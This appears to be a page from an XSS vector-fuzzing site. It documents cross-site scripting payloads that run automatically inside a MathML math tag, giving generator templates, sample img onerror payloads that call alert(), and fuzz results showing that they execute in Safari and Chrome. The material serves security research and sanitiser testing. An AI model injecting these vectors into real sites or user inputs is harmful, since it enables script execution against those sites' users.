XSS vectors that execute automatically inside math

This vector shows which events fire without user interaction inside a math tag

Created by: hackvertor

Created on: 4/17/2024, 6:33:17 PM

Updated on: 7/14/2024, 10:33:58 AM

Vector type: XSS

Template used:
<math><$[data1] src=1 srcdoc=1 href=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]></math>
<math><$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]></math>
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<math><img->onerror src=1 srcdoc=1 href=1 href=1 ="alert('img->onerror->')"></img->onerror></math>
<math><img->onerror ="alert('img->onerror->')"></img->onerror></math>

Fuzz results

Safari logo
Safari 17.4.1 Unknown Unknown
Found 1 result
Data
img->onerror
Chrome logo
Chrome 124.0.0.0 Unknown Unknown
Found 1 result
Data
img->onerror